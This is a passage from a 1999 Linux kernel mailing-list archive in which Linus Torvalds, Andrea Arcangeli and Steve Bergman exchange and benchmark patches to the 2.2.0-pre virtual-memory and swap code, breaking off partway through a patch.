 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -642,7 +657,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }



Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 38%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-01 23:46 64%         ` Steve Bergman
@ 1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  8:33 62%             ` Steve Bergman
                               ` (3 more replies)
  0 siblings, 4 replies; 200+ results
From: Linus Torvalds @ 1999-01-02  6:55 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Andrea Arcangeli, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm



On Fri, 1 Jan 1999, Steve Bergman wrote:
>
> I got the patch and I must say I'm impressed.  I ran my "117 image" test
> and got these results:
> 
> 2.1.131-ac11                         172 sec  (This was previously the best)
> 2.2.0-pre1 + Arcangeli's 1st patch   400 sec
> test1-pre  + Arcangeli's 2nd patch   119 sec (!)

Would you care to do some more testing? In particular, I'd like to hear
how basic 2.2.0pre3 works (that's essentially the same as test1-pre, with
only minor updates)? I'd like to calibrate the numbers against that,
rather than against kernels that I haven't actually ever run myself. 

The other thing I'd like to hear is how pre3 looks with this patch, which
should behave basically like Andrea's latest patch but without the
obfuscation he put into his patch..

		Linus

-----
diff -u --recursive --new-file v2.2.0-pre3/linux/Makefile linux/Makefile
--- v2.2.0-pre3/linux/Makefile	Fri Jan  1 12:58:14 1999
+++ linux/Makefile	Fri Jan  1 12:58:29 1999
@@ -1,7 +1,7 @@
 VERSION = 2
 PATCHLEVEL = 2
 SUBLEVEL = 0
-EXTRAVERSION =-pre3
+EXTRAVERSION =-pre4
 
 ARCH := $(shell uname -m | sed -e s/i.86/i386/ -e s/sun4u/sparc64/ -e s/arm.*/arm/ -e s/sa110/arm/)
 
diff -u --recursive --new-file v2.2.0-pre3/linux/drivers/misc/parport_procfs.c linux/drivers/misc/parport_procfs.c
--- v2.2.0-pre3/linux/drivers/misc/parport_procfs.c	Sun Nov  8 14:02:59 1998
+++ linux/drivers/misc/parport_procfs.c	Fri Jan  1 21:27:12 1999
@@ -305,12 +305,11 @@
 {
 	base = new_proc_entry("parport", S_IFDIR, &proc_root,PROC_PARPORT,
 			      NULL);
-	base->fill_inode = &parport_modcount;
-
 	if (base == NULL) {
 		printk(KERN_ERR "Unable to initialise /proc/parport.\n");
 		return 0;
 	}
+	base->fill_inode = &parport_modcount;
 
 	return 1;
 }
diff -u --recursive --new-file v2.2.0-pre3/linux/fs/binfmt_misc.c linux/fs/binfmt_misc.c
--- v2.2.0-pre3/linux/fs/binfmt_misc.c	Fri Jan  1 12:58:20 1999
+++ linux/fs/binfmt_misc.c	Fri Jan  1 13:00:10 1999
@@ -30,6 +30,16 @@
 #include <asm/uaccess.h>
 #include <asm/spinlock.h>
 
+/*
+ * We should make this work with a "stub-only" /proc,
+ * which would just not be able to be configured.
+ * Right now the /proc-fs support is too black and white,
+ * though, so just remind people that this should be
+ * fixed..
+ */
+#ifndef CONFIG_PROC_FS
+#error You really need /proc support for binfmt_misc. Please reconfigure!
+#endif
 
 #define VERBOSE_STATUS /* undef this to save 400 bytes kernel memory */
 
diff -u --recursive --new-file v2.2.0-pre3/linux/include/linux/swapctl.h linux/include/linux/swapctl.h
--- v2.2.0-pre3/linux/include/linux/swapctl.h	Tue Dec 22 14:16:58 1998
+++ linux/include/linux/swapctl.h	Fri Jan  1 22:31:21 1999
@@ -90,18 +90,6 @@
 #define PAGE_DECLINE		(swap_control.sc_page_decline)
 #define PAGE_INITIAL_AGE	(swap_control.sc_page_initial_age)
 
-/* Given a resource of N units (pages or buffers etc), we only try to
- * age and reclaim AGE_CLUSTER_FRACT per 1024 resources each time we
- * scan the resource list. */
-static inline int AGE_CLUSTER_SIZE(int resources)
-{
-	unsigned int n = (resources * AGE_CLUSTER_FRACT) >> 10;
-	if (n < AGE_CLUSTER_MIN)
-		return AGE_CLUSTER_MIN;
-	else
-		return n;
-}
-
 #endif /* __KERNEL */
 
 #endif /* _LINUX_SWAPCTL_H */
diff -u --recursive --new-file v2.2.0-pre3/linux/mm/vmscan.c linux/mm/vmscan.c
--- v2.2.0-pre3/linux/mm/vmscan.c	Fri Jan  1 12:58:21 1999
+++ linux/mm/vmscan.c	Fri Jan  1 22:41:58 1999
@@ -363,13 +363,23 @@
 	/* 
 	 * We make one or two passes through the task list, indexed by 
 	 * assign = {0, 1}:
-	 *   Pass 1: select the swappable task with maximal swap_cnt.
-	 *   Pass 2: assign new swap_cnt values, then select as above.
+	 *   Pass 1: select the swappable task with maximal RSS that has
+	 *         not yet been swapped out. 
+	 *   Pass 2: re-assign rss swap_cnt values, then select as above.
+	 *
 	 * With this approach, there's no need to remember the last task
 	 * swapped out.  If the swap-out fails, we clear swap_cnt so the 
 	 * task won't be selected again until all others have been tried.
+	 *
+	 * Think of swap_cnt as a "shadow rss" - it tells us which process
+	 * we want to page out (always try largest first).
 	 */
-	counter = ((PAGEOUT_WEIGHT * nr_tasks) >> 10) >> priority;
+	counter = nr_tasks / (priority+1);
+	if (counter < 1)
+		counter = 1;
+	if (counter > nr_tasks)
+		counter = nr_tasks;
+
 	for (; counter >= 0; counter--) {
 		assign = 0;
 		max_cnt = 0;
@@ -382,15 +392,9 @@
 				continue;
 	 		if (p->mm->rss <= 0)
 				continue;
-			if (assign) {
-				/* 
-				 * If we didn't select a task on pass 1, 
-				 * assign each task a new swap_cnt.
-				 * Normalise the number of pages swapped
-				 * by multiplying by (RSS / 1MB)
-				 */
-				p->swap_cnt = AGE_CLUSTER_SIZE(p->mm->rss);
-			}
+			/* Refresh swap_cnt? */
+			if (assign)
+				p->swap_cnt = p->mm->rss;
 			if (p->swap_cnt > max_cnt) {
 				max_cnt = p->swap_cnt;
 				pbest = p;
@@ -404,14 +408,13 @@
 			}
 			goto out;
 		}
-		pbest->swap_cnt--;
 
 		/*
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
 		if (swap_out_process(pbest, gfp_mask) == 1)
-				return 1;
+			return 1;
 	}
 out:
 	return 0;
@@ -451,19 +454,17 @@
 	/* max one hundreth of a second */
 	end_time = jiffies + (HZ-1)/100;
 	do {
-		int priority = 5;
+		int priority = 8;
 		int count = pager_daemon.swap_cluster;
 
 		switch (kswapd_state) {
 			do {
 			default:
 				free_memory(shrink_mmap(priority, 0));
+				free_memory(swap_out(priority, 0));
 				kswapd_state++;
 			case 1:
 				free_memory(shm_swap(priority, 0));
-				kswapd_state++;
-			case 2:
-				free_memory(swap_out(priority, 0));
 				shrink_dcache_memory(priority, 0);
 				kswapd_state = 0;
 			} while (--priority >= 0);
@@ -562,7 +563,7 @@
 
 		current->flags |= PF_MEMALLOC;
 	
-		priority = 5;
+		priority = 8;
 		do {
 			free_memory(shrink_mmap(priority, gfp_mask));
 			free_memory(shm_swap(priority, gfp_mask));


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 46%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
@ 1999-01-02  8:33 62%             ` Steve Bergman
  1999-01-02 14:48 64%             ` Andrea Arcangeli
                               ` (2 subsequent siblings)
  3 siblings, 0 replies; 200+ results
From: Steve Bergman @ 1999-01-02  8:33 UTC (permalink / raw)
  Cc: Benjamin Redelings I, Stephen C. Tweedie, linux-kernel, Alan Cox,
	Rik van Riel, linux-mm

Linus Torvalds wrote:
> 
> On Fri, 1 Jan 1999, Steve Bergman wrote:
> >
> > I got the patch and I must say I'm impressed.  I ran my "117 image" test
> > and got these results:
> >
> > 2.1.131-ac11                         172 sec  (This was previously the best)
> > 2.2.0-pre1 + Arcangeli's 1st patch   400 sec
> > test1-pre  + Arcangeli's 2nd patch   119 sec (!)
> 
> Would you care to do some more testing? In particular, I'd like to hear
> how basic 2.2.0pre3 works (that's essentially the same as test1-pre, with
> only minor updates)? I'd like to calibrate the numbers against that,
> rather than against kernels that I haven't actually ever run myself.
> 
> The other thing I'd like to hear is how pre3 looks with this patch, which
> should behave basically like Andrea's latest patch 

Hi Linus,

Andrea sent another patch to correct a problem with i/o bound processes,
which he also posted to linux-kernel.  The performance in this test is
unchanged.

Here are the results:


2.1.131-ac11                                    172 sec  

2.2.0-pre1 + Arcangeli's 1st patch              400 sec
test1-pre  + Arcangeli's 2nd patch              119 sec 
test1-pre  + Arcangeli's 3rd patch              119 sec
test1-pre  + Arcangeli's 3rd patch              117 sec 
(changed to priority = 9 in mm/vmscan.c)

2.2.0-pre3                                      175 sec
2.2.0-pre3 + Linus's patch                      129 sec

RH5.2 Stock (2.0.36-0.7)                        280 sec



I noticed that in watching the 'vmstat 1' during the test that
'2.2.0+Linus patch' was not *quite* as smooth as the Archangeli patches,
in that there were periods of 2 or 3 seconds in which the swap out rate
would fall to ~800k/sec and then jump back up to 1.8-2.5MB/sec.  I have
only run your patch once though.  I'll check it further tomorrow to
confirm that that is really the case.  Note how much better 2.2 is doing
compared to 2.0.36-0.7 in this situation.

I should be available for a good part of this weekend for further
testing; Just let me know.

As a reference:

AMD K6-2 300
128MB ram
2GB seagate scsi2 dedicated to swap
Data drive is 6.5GB UDMA


Steve Bergman
steve@netplus.net
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 62%]

* Re: BUG: 2.2.0-pre2 on 5500 (and maybe 6500)
  1999-01-01 19:44 64% ` Tom Rini
@ 1999-01-02  9:31 64%   ` Jens Ch. Restemeier
  0 siblings, 0 replies; 200+ results
From: Jens Ch. Restemeier @ 1999-01-02  9:31 UTC (permalink / raw)
  To: Tom Rini; +Cc: linuxppc-dev


Tom Rini wrote:
> 
> On Fri, 1 Jan 1999, Jens Ch. Restemeier wrote:
> 
> > This bugreport applies to a PMac 5500/225, and maybe a 6500, because
> > they share a common motherboard.
> > I'm booting 2.2.0-pre2 kernel with BootX.
> 
> Well, the all-important question is does this show up with a vger kernel?
> (2.1.130)

I built my 2.1.127 kernel with the sources from either ftp.linuxppc.org
or samba (can't remeber). I'd try with vger, but I can't do CVS from my
Mac. The latest snapshot of vger I've seen around was AGES old. 

The 2.2.0 kernel was downloaded as a binary.

Jens


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  8:33 62%             ` Steve Bergman
@ 1999-01-02 14:48 64%             ` Andrea Arcangeli
  1999-01-02 15:38 42%             ` Andrea Arcangeli
  1999-01-02 20:04 64%             ` Steve Bergman
  3 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-02 14:48 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Fri, 1 Jan 1999, Linus Torvalds wrote:

> The other thing I'd like to hear is how pre3 looks with this patch, which
> should behave basically like Andrea's latest patch but without the
> obfuscation he put into his patch..

I still think the most important part of all my latest VM patches is my
new do_free_user_and_cache(). It allow the VM to scale very better and be
perfectly balanced. 

Why to run `count' times swap_out() without take a look if the cache grows
too much?

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
  1999-01-02  8:33 62%             ` Steve Bergman
  1999-01-02 14:48 64%             ` Andrea Arcangeli
@ 1999-01-02 15:38 42%             ` Andrea Arcangeli
  1999-01-02 18:10 64%               ` Linus Torvalds
  1999-01-02 20:52 31%               ` Andrea Arcangeli
  1999-01-02 20:04 64%             ` Steve Bergman
  3 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-02 15:38 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Fri, 1 Jan 1999, Linus Torvalds wrote:

> The other thing I'd like to hear is how pre3 looks with this patch, which
> should behave basically like Andrea's latest patch but without the
> obfuscation he put into his patch..

I rediffed my latest swapout stuff against your latest tree (I consider
your latest patch as test1-pre4, right?).

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.52
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Sat Jan  2 15:53:33 1999
@@ -10,6 +10,11 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm: do_free_user_and_cache().
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -162,8 +167,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +186,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +201,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +218,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -381,6 +389,7 @@
 		counter = nr_tasks;
 
 	for (; counter >= 0; counter--) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -413,8 +422,9 @@
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-			return 1;
+		retval = swap_out_process(pbest, gfp_mask);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -441,42 +451,64 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 2;
+		case 2:
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+			*state = 0;
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -524,6 +556,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -543,35 +576,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -594,7 +615,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -632,9 +654,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -643,7 +664,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }



The try_to_swap_out() changes (entry = atomic_read()) are really not
important for the performance. We could always return 1 instead of
atomic_read() and consider the retval 1 from swap_out() as every current
retval >1. Since I can't see a big performance impact by atomic_read() I
left it here since it will give us more info than returning a plain 1 and
so knowing only that we have succesfully unliked a page from the user
process memory. 

I have also a new experimental patch against the one above, that here
improve a _lot_ the swapout performance. The benchmark that dirtify 160
Mbyte in loop was used to take near 106 sec and now takes 89sec. It will
also avoid all not trashing process to be swapped out.

I don't consider this production code though but I am interested if
somebody will try it ;):

Index: mm//vmscan.c
===================================================================
RCS file: /var/cvs/linux/mm/vmscan.c,v
retrieving revision 1.1.1.1.2.52
diff -u -r1.1.1.1.2.52 vmscan.c
--- vmscan.c	1999/01/02 14:53:33	1.1.1.1.2.52
+++ linux/mm/vmscan.c	1999/01/02 15:19:21
@@ -353,7 +353,6 @@
 	}
 
 	/* We didn't find anything for the process */
-	p->swap_cnt = 0;
 	p->swap_address = 0;
 	return 0;
 }
@@ -423,6 +422,14 @@
 		 * that we actually free'd up a page as a result.
 		 */
 		retval = swap_out_process(pbest, gfp_mask);
+		/*
+		 * Don't play with other tasks next time if the huge one
+		 * is been swapedin in the meantime. This can be considered
+		 * a bit experimental, but it seems to improve a lot the
+		 * swapout performances here. -arca
+		 */
+		p->swap_cnt = p->mm->rss;
+
 		if (retval)
 			return retval;
 	}
 

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 42%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02 15:38 42%             ` Andrea Arcangeli
@ 1999-01-02 18:10 64%               ` Linus Torvalds
  1999-01-02 20:52 31%               ` Andrea Arcangeli
  1 sibling, 0 replies; 200+ results
From: Linus Torvalds @ 1999-01-02 18:10 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Steve Bergman, Benjamin Redelings I, Stephen C. Tweedie, Alan Cox,
	Rik van Riel, linux-mm



On Sat, 2 Jan 1999, Andrea Arcangeli wrote:
> 
> > The other thing I'd like to hear is how pre3 looks with this patch, which
> > should behave basically like Andrea's latest patch but without the
> > obfuscation he put into his patch..
> 
> I rediffed my latest swapout stuff against your latest tree (I consider
> your latest patch as test1-pre4, right?).

Andrea, I already told you that I refuse to apply patches that include
this many obvious cases of pure obfuscation.

As I already told you in an earlier mail, your state machine only has two
states, not three like the code makes you believe. Gratuitous changes like
that that only show that the writer didn't actually _think_ about the code
is not something I want at any stage, much less now.

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02  6:55 46%           ` Linus Torvalds
                               ` (2 preceding siblings ...)
  1999-01-02 15:38 42%             ` Andrea Arcangeli
@ 1999-01-02 20:04 64%             ` Steve Bergman
  3 siblings, 0 replies; 200+ results
From: Steve Bergman @ 1999-01-02 20:04 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

Linus Torvalds wrote:
> 
> Would you care to do some more testing? In particular, I'd like to hear
> how basic 2.2.0pre3 works (that's essentially the same as test1-pre, with
> only minor updates)? I'd like to calibrate the numbers against that,
> rather than against kernels that I haven't actually ever run myself.
> 

I've done some more testing, this time including the low memory case. 
For low memory testing I built the dhcp server from SRPM in 8MB with X,
xdm, various daemons (sendmail, named, inetd, etc.), and vmstat 1
running.  Swap area stayed at about 8MB usage.  I have also run the
128MB tests some more and have slightly more accurate results.  Here is
the summary:



Kernel                                          128MB              8MB
------------                                    -------           
------
2.1.131-ac11                                    172 sec            260
sec
test1-pre  + Arcangeli's patch                  119 sec            226
sec
2.2.0-pre3                                      175 sec            334
sec
2.2.0-pre3 + Linus's patch                      129 sec            312
sec
RH5.2 Stock (2.0.36-0.7)                        280 sec            N/A



-Steve
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02 15:38 42%             ` Andrea Arcangeli
  1999-01-02 18:10 64%               ` Linus Torvalds
@ 1999-01-02 20:52 31%               ` Andrea Arcangeli
  1999-01-03  2:59 32%                 ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-02 20:52 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Linus Torvalds, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Sat, 2 Jan 1999, Andrea Arcangeli wrote:

> I rediffed my latest swapout stuff against your latest tree (I consider
> your latest patch as test1-pre4, right?).

I developed new exiting stuff this afternoon! The most important thing is
the swapout smart weight code. Basing the priority on the number of
process to try to swapout was really ugly and not smart.

The second change is done over shrink_mmap(), this will cause
shrink_mmap() to care very more about aging. We have only one bit and we
must use it carefully to get not out of cache ;) 

I also added/removed some PG_referenced. But please, don't trust too much
the pg_refernced changes since I have not thought about it too much (maybe
they are not needed?). 

I returned to put the minimum of cache and buffer to 5%. This allow me to
run every trashing memory proggy I can for every time but I still have all
my last command run (free) and filesystem (ls -l) in cache (because the
trashing memory _only_ play with its VM and asks nothing to the kernel of
course). 

Ah and woops, in the last patch I do a mistake and I forget to change
max_cnt to unsigned long. This should be changed also in your tree, Linus. 

This new patch seems to really rocks here and seems _far_ better than
anything I tried before! Steve, could try it and feedback? Thanks ;) 

Please excuse me Linus if I have not yet cleanedup things, but my spare
time is very small and I would _try_ to improve things a bit more
before...

This patch is against 2.2.0-pre4 (the lateest patch posted by Linus here).

Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.11
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Sat Jan  2 21:40:13 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/include/linux/pagemap.h
diff -u linux/include/linux/pagemap.h:1.1.1.1 linux/include/linux/pagemap.h:1.1.1.1.2.1
--- linux/include/linux/pagemap.h:1.1.1.1	Fri Nov 20 00:01:16 1998
+++ linux/include/linux/pagemap.h	Sat Jan  2 21:40:13 1999
@@ -77,6 +77,7 @@
 		*page->pprev_hash = page->next_hash;
 		page->pprev_hash = NULL;
 	}
+	clear_bit(PG_referenced, &page->flags);
 	page_cache_size--;
 }
 
Index: linux/mm/filemap.c
diff -u linux/mm/filemap.c:1.1.1.8 linux/mm/filemap.c:1.1.1.1.2.35
--- linux/mm/filemap.c:1.1.1.8	Fri Jan  1 19:12:53 1999
+++ linux/mm/filemap.c	Sat Jan  2 21:40:13 1999
@@ -118,6 +122,10 @@
 	__free_page(page);
 }
 
+#define HANDLE_AGING(page)					\
+	if (test_and_clear_bit(PG_referenced, &(page)->flags))	\
+		continue;
+
 int shrink_mmap(int priority, int gfp_mask)
 {
 	static unsigned long clock = 0;
@@ -140,12 +148,11 @@
 			page = page->next_hash;
 			clock = page->map_nr;
 		}
-		
-		if (test_and_clear_bit(PG_referenced, &page->flags))
-			continue;
 
 		/* Decrement count only for non-referenced pages */
-		count--;
+		if (!test_bit(PG_referenced, &page->flags))
+			count--;
+
 		if (PageLocked(page))
 			continue;
 
@@ -160,6 +167,7 @@
 		if (page->buffers) {
 			if (buffer_under_min())
 				continue;
+			HANDLE_AGING(page);
 			if (!try_to_free_buffers(page))
 				continue;
 			return 1;
@@ -167,12 +175,14 @@
 
 		/* is it a swap-cache or page-cache page? */
 		if (page->inode) {
-			if (pgcache_under_min())
-				continue;
 			if (PageSwapCache(page)) {
+				HANDLE_AGING(page);
 				delete_from_swap_cache(page);
 				return 1;
 			}
+			if (pgcache_under_min())
+				continue;
+			HANDLE_AGING(page);
 			remove_inode_page(page);
 			return 1;
 		}
@@ -181,6 +191,8 @@
 	return 0;
 }
 
+#undef HANDLE_AGING
+
 /*
  * Update a page cache copy, when we're doing a "write()" system call
  * See also "update_vm_cache()".
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.57
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Sat Jan  2 21:45:22 1999
@@ -10,6 +10,12 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm (do_free_user_and_cache), and
+ * developed a smart mechanism to handle the swapout weight.
+ * Copyright (C) 1998  Andrea Arcangeli
